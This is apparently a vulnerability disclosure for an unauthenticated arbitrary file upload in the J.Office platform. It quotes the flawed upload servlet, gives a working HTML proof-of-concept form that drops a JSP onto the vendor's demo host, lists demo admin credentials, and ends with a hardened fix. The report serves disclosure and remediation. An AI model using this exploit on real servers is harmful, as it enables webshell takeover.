2014-07-08: Details sent to the vendor, awaiting vendor handling
2014-07-12: Vendor confirmed; details disclosed to the vendor only
2014-07-15: Details opened to third-party security partners
2014-09-05: Details opened to core white hats and relevant domain experts
2014-09-15: Details opened to regular white hats
2014-09-25: Details opened to intern white hats
2014-10-06: Details opened to the public

No login required: arbitrary file upload to getshell, one for the front page

Official site
http://www.jee-soft.cn/htsite/index.html
Product
J.Office collaborative office development platform
Product introduction
http://www.jee-soft.cn/htsite/html/cpjfw/cpzx/2012/06/12/1339484245731.html
Success stories

An arbitrary file upload exists; it was also tested successfully on the demo site.
J.Office online trial addresses:
China Telecom: http://office.jee-soft.cn:8080/index.jsp
China Netcom: http://oa.jee-soft.cn:8080/index.jsp
Account: admin, password: 1
The product is open source and can be downloaded for analysis:
http://www.jee-soft.cn/htsite/page/platformProduct/getProductList.ht
Let's test against the demo site. Address:
http://office.jee-soft.cn:8080/jasper-upload
The main handling code is as follows (the upload servlet behind /jasper-upload; the snippet is truncated where the original report stops):

```java
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    req.setCharacterEncoding("UTF-8");
    resp.setCharacterEncoding("UTF-8");
    try {
        DiskFileItemFactory factory = new DiskFileItemFactory();
        factory.setSizeThreshold(4096);
        factory.setRepository(new File(this.tempPath));
        ServletFileUpload fu = new ServletFileUpload(factory);
        List<FileItem> fileItems = fu.parseRequest(req);
        for (FileItem fi : fileItems) {
            if ("file_cat".equals(fi.getFieldName())) {
                this.fileCat = fi.getString();
            }
            if ("file_path".equals(fi.getFieldName())) {
                this.filePath = fi.getString(); // value of a plain text field: the upload path is chosen by the client
            }
        }
        Iterator<FileItem> i = fileItems.iterator();
        while (i.hasNext()) {
            FileItem fi = i.next();
            String fileContentType = fi.getContentType();
            if (fileContentType == null) {
                continue;
            }
            if (fi.getContentType() == null) {
                continue;
            }
            String path = fi.getName();
            int start = path.lastIndexOf("\\");
            String fileName = path.substring(start + 1);
            String relativeFullPath = null;
            String generName = FileUtil.generateFilename(fileName); // random filename; harmless, not the key point
            int sindex = generName.lastIndexOf("/");
            int eindex = generName.lastIndexOf(".");
            String generDir = generName.substring(sindex + 1, eindex);
            generName = generName.substring(0, sindex) + "/" + generDir + "/" + generName.substring(sindex + 1, generName.length());
            if (!"".equals(this.filePath)) // the key point: filePath is client-controlled, it only has to be non-empty
                relativeFullPath = this.filePath; // once this branch is taken, the random filename no longer matters
            else {
                relativeFullPath = this.fileCat + "/" + generName;
            }
            int index = relativeFullPath.lastIndexOf("/");
            File dirPath = new File(this.uploadPath + "/" + relativeFullPath.substring(0, index + 1));
            if (!dirPath.exists()) { // a missing directory is simply created
                dirPath.mkdirs();
            }
            File temFile = new File(this.uploadPath + "/" + relativeFullPath); // filePath is controlled, hence arbitrary file upload
            fi.write(temFile); // the file is written to disk
            // the rest is irrelevant
            .........
```
Clearly an arbitrary file upload.

Proof-of-concept code

```html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>upload</title>
</head>
<body>
  <form method="post" action="http://office.jee-soft.cn:8080/jasper-upload" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="hidden" name="file_cat" value="a" />
    <input type="hidden" name="file_path" value="temp/2.jsp" />
    <input type="submit" name="tijiao" value="confirm" />
  </form>
</body>
</html>
```
After uploading, the file path is
http://office.jee-soft.cn:8080/attachFiles/temp/2.jsp
Fix: hard-code filePath on the server so users cannot set it, and validate the filename.

Severity: High
Vulnerability Rank: 16
Confirmed: 2014-07-12 22:47
None yet.
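As an added illustration of that fix (example code written for this write-up, not J.Office's own), the following helper decides the target path entirely on the server side: the client-supplied file_path is never consulted, file_cat is restricted to a single plain segment, the extension is allowlisted, the stored name is generated, and the canonical result is checked against the canonical upload root. The class, method and names are hypothetical; Set.of assumes Java 9 or later.

```java
import java.io.File;
import java.io.IOException;
import java.util.Set;
import java.util.UUID;

// Hypothetical hardened replacement for the path logic in the servlet above.
public class SafeUploadPath {
    // Allowlist of extensions the application actually needs; .jsp is never on it.
    private static final Set<String> ALLOWED = Set.of("jpg", "jpeg", "png", "gif", "pdf", "doc", "docx");

    /**
     * Returns the file the upload may be written to, or throws.
     * uploadRoot - configured attachment directory (server-side constant)
     * fileCat    - category from the form; only one plain path segment is accepted
     * clientName - filename from the multipart part (untrusted)
     */
    public static File resolveTarget(File uploadRoot, String fileCat, String clientName) throws IOException {
        // 1. Category must be a single segment: no separators, no "..".
        if (fileCat == null || !fileCat.matches("[A-Za-z0-9_-]{1,32}")) {
            throw new IOException("invalid file_cat");
        }
        // 2. Keep only the last path component of the client name, for either separator.
        String base = clientName == null ? "" : clientName.replace('\\', '/');
        base = base.substring(base.lastIndexOf('/') + 1);
        // 3. Extension is allowlisted, compared case-insensitively, taken after the LAST dot,
        //    so "2.jsp", "x.JSP" and "x.jpg.jsp" are all rejected here.
        int dot = base.lastIndexOf('.');
        if (dot <= 0 || dot == base.length() - 1) {
            throw new IOException("missing extension");
        }
        String ext = base.substring(dot + 1).toLowerCase();
        if (!ALLOWED.contains(ext)) {
            throw new IOException("extension not allowed: " + ext);
        }
        // 4. The on-disk name is generated; the client name never reaches the filesystem.
        String stored = UUID.randomUUID().toString() + "." + ext;
        File dir = new File(uploadRoot, fileCat);
        File target = new File(dir, stored);
        // 5. Defence in depth: the canonical target must still lie under the canonical root.
        String rootCanon = uploadRoot.getCanonicalPath() + File.separator;
        if (!target.getCanonicalPath().startsWith(rootCanon)) {
            throw new IOException("path escapes upload root");
        }
        if (!dir.isDirectory() && !dir.mkdirs()) {
            throw new IOException("cannot create " + dir);
        }
        return target;
    }
}
```

Serving the attachment directory as static content only, with JSP execution disabled for that path, closes the same hole from the container side should the upload check ever regress.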